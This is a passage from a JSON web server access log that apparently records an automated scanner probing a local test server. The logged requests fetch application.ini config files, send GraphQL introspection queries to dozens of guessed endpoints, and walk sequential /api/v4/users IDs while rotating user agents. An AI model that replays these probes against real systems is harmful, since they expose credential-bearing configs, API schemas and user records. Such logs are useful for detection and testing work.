Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site_cg/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /slr/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graph HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.694","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/64 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.003","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/65 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/66 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/67 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/68 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/69 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/70 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/71 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/72 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/73 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/74 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/75 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/76 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/77 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/explorer 